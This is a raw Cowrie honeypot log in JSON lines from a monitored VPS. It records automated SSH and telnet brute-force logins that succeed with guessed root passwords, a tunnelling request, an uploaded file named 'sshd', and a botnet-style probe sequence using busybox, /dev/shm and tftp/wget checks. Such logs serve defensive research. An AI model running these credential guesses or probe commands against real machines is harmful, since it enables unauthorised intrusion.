{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47836,"dst_ip":"1.2.3.4","dst_port":22,"session":"23409efd6403","protocol":"ssh","message":"New connection: 212.227.235.229:47836 (1.2.3.4:22) [session: 23409efd6403]","sensor":"my-vps","timestamp":"2025-09-09T00:09:55.719862Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:09:55.720878Z","src_ip":"212.227.235.229","session":"23409efd6403"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48201,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ba77be8d241","protocol":"ssh","message":"New connection: 212.227.235.229:48201 (1.2.3.4:22) [session: 1ba77be8d241]","sensor":"my-vps","timestamp":"2025-09-09T00:09:55.819457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:09:55.820169Z","src_ip":"212.227.235.229","session":"1ba77be8d241"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T00:09:55.951071Z","src_ip":"212.227.235.229","session":"1ba77be8d241"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:09:56.345293Z","src_ip":"212.227.235.229","session":"1ba77be8d241"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T00:09:56.476548Z","session":"1ba77be8d241"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.224","src_port":25890,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac7232afa8b5","protocol":"ssh","message":"New connection: 172.236.228.224:25890 (1.2.3.4:22) [session: ac7232afa8b5]","sensor":"my-vps","timestamp":"2025-09-09T00:10:37.041789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:10:37.372935Z","src_ip":"172.236.228.224","session":"ac7232afa8b5"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:10:37.374600Z","src_ip":"172.236.228.224","session":"ac7232afa8b5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:10:38.431794Z","src_ip":"172.236.228.224","session":"ac7232afa8b5"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.224","src_port":25892,"dst_ip":"1.2.3.4","dst_port":22,"session":"eca126f74501","protocol":"ssh","message":"New connection: 172.236.228.224:25892 (1.2.3.4:22) [session: eca126f74501]","sensor":"my-vps","timestamp":"2025-09-09T00:10:38.627268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:10:38.957002Z","src_ip":"172.236.228.224","session":"eca126f74501"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:10:38.957632Z","src_ip":"172.236.228.224","session":"eca126f74501"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:10:40.006273Z","src_ip":"172.236.228.224","session":"eca126f74501"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.224","src_port":57052,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ede02c731e1","protocol":"ssh","message":"New connection: 172.236.228.224:57052 (1.2.3.4:22) [session: 2ede02c731e1]","sensor":"my-vps","timestamp":"2025-09-09T00:10:40.197751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:10:40.519996Z","src_ip":"172.236.228.224","session":"2ede02c731e1"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:10:40.521453Z","src_ip":"172.236.228.224","session":"2ede02c731e1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:10:41.844225Z","src_ip":"172.236.228.224","session":"2ede02c731e1"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:11:05.819289Z","src_ip":"212.227.235.229","session":"1ba77be8d241"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59958,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc8481800713","protocol":"ssh","message":"New connection: 217.72.205.35:59958 (1.2.3.4:22) [session: cc8481800713]","sensor":"my-vps","timestamp":"2025-09-09T00:12:06.522161Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:12:06.523313Z","src_ip":"217.72.205.35","session":"cc8481800713"}
{"eventid":"cowrie.session.connect","src_ip":"118.44.215.35","src_port":52948,"dst_ip":"1.2.3.4","dst_port":23,"session":"1eb84b115e16","protocol":"telnet","message":"New connection: 118.44.215.35:52948 (1.2.3.4:23) [session: 1eb84b115e16]","sensor":"my-vps","timestamp":"2025-09-09T00:12:46.889366Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33402,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb898555dc99","protocol":"ssh","message":"New connection: 212.227.235.229:33402 (1.2.3.4:22) [session: cb898555dc99]","sensor":"my-vps","timestamp":"2025-09-09T00:13:10.557916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:13:10.917046Z","src_ip":"212.227.235.229","session":"cb898555dc99"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:13:10.917789Z","src_ip":"212.227.235.229","session":"cb898555dc99"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:13:12.308929Z","src_ip":"212.227.235.229","session":"cb898555dc99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33414,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff98a0574aab","protocol":"ssh","message":"New connection: 212.227.235.229:33414 (1.2.3.4:22) [session: ff98a0574aab]","sensor":"my-vps","timestamp":"2025-09-09T00:13:12.553434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:13:12.996661Z","src_ip":"212.227.235.229","session":"ff98a0574aab"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:13:12.997297Z","src_ip":"212.227.235.229","session":"ff98a0574aab"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:13:14.353935Z","src_ip":"212.227.235.229","session":"ff98a0574aab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33426,"dst_ip":"1.2.3.4","dst_port":22,"session":"fee99dc1ba29","protocol":"ssh","message":"New connection: 212.227.235.229:33426 (1.2.3.4:22) [session: fee99dc1ba29]","sensor":"my-vps","timestamp":"2025-09-09T00:13:14.575847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:13:15.005754Z","src_ip":"212.227.235.229","session":"fee99dc1ba29"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T00:13:15.006859Z","src_ip":"212.227.235.229","session":"fee99dc1ba29"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:13:16.363426Z","src_ip":"212.227.235.229","session":"fee99dc1ba29"}
{"eventid":"cowrie.session.closed","duration":30.349697828292847,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:13:17.239004Z","src_ip":"118.44.215.35","session":"1eb84b115e16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57873,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f36145a5de","protocol":"ssh","message":"New connection: 212.227.235.229:57873 (1.2.3.4:22) [session: c7f36145a5de]","sensor":"my-vps","timestamp":"2025-09-09T00:14:35.654505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:14:35.655288Z","src_ip":"212.227.235.229","session":"c7f36145a5de"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-09-09T00:14:36.027491Z","src_ip":"212.227.235.229","session":"c7f36145a5de"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:14:37.143382Z","src_ip":"212.227.235.229","session":"c7f36145a5de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49866,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9a251f914a9","protocol":"ssh","message":"New connection: 212.227.235.229:49866 (1.2.3.4:22) [session: e9a251f914a9]","sensor":"my-vps","timestamp":"2025-09-09T00:17:59.094634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:17:59.095429Z","src_ip":"212.227.235.229","session":"e9a251f914a9"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T00:18:00.863845Z","src_ip":"212.227.235.229","session":"e9a251f914a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38574,"dst_ip":"1.2.3.4","dst_port":23,"session":"33cf7f72c3e9","protocol":"telnet","message":"New connection: 212.227.125.160:38574 (1.2.3.4:23) [session: 33cf7f72c3e9]","sensor":"my-vps","timestamp":"2025-09-09T00:18:44.345714Z"}
{"eventid":"cowrie.login.success","username":"root","password":"klv123","message":"login attempt [root/klv123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.034938Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:18:45.057883Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.275830Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.277673Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.278645Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.279963Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.280611Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.281272Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox PWKWR","message":"CMD: cat /proc/mounts; /bin/busybox PWKWR","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.499358Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox PWKWR","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox PWKWR","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.719758Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox PWKWR","message":"CMD: tftp; wget; /bin/busybox PWKWR","sensor":"my-vps","timestamp":"2025-09-09T00:18:45.939390Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-09-09T00:18:46.159374Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-09-09T00:18:46.162278Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"/bin/busybox PWKWR","message":"CMD: /bin/busybox PWKWR","sensor":"my-vps","timestamp":"2025-09-09T00:18:46.381174Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-09-09T00:18:46.383116Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-09-09T00:18:46.384780Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-09-09T00:18:46.385746Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95b0e16d61460836fb5ba7ded95a68a9ed27042d57f86aec10e5de426233d567","size":3550,"shasum":"95b0e16d61460836fb5ba7ded95a68a9ed27042d57f86aec10e5de426233d567","duplicate":false,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/95b0e16d61460836fb5ba7ded95a68a9ed27042d57f86aec10e5de426233d567 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:18:46.387258Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.session.closed","duration":2.0461864471435547,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:18:46.392031Z","src_ip":"212.227.125.160","session":"33cf7f72c3e9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56906,"dst_ip":"1.2.3.4","dst_port":22,"session":"00a78e86358f","protocol":"ssh","message":"New connection: 217.72.205.35:56906 (1.2.3.4:22) [session: 00a78e86358f]","sensor":"my-vps","timestamp":"2025-09-09T00:18:55.725794Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:18:55.727010Z","src_ip":"217.72.205.35","session":"00a78e86358f"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/c0feb47a284f711bc621a91c4374b9cc8f2e8e6d014747f7a0c16729b5c1b191","shasum":"c0feb47a284f711bc621a91c4374b9cc8f2e8e6d014747f7a0c16729b5c1b191","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/c0feb47a284f711bc621a91c4374b9cc8f2e8e6d014747f7a0c16729b5c1b191","sensor":"my-vps","timestamp":"2025-09-09T00:19:37.171488Z","src_ip":"212.227.235.229","session":"c7f36145a5de"}
{"eventid":"cowrie.session.closed","duration":"301.5","message":"Connection lost after 301.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:19:37.172418Z","src_ip":"212.227.235.229","session":"c7f36145a5de"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:19:59.118005Z","src_ip":"212.227.235.229","session":"e9a251f914a9"}
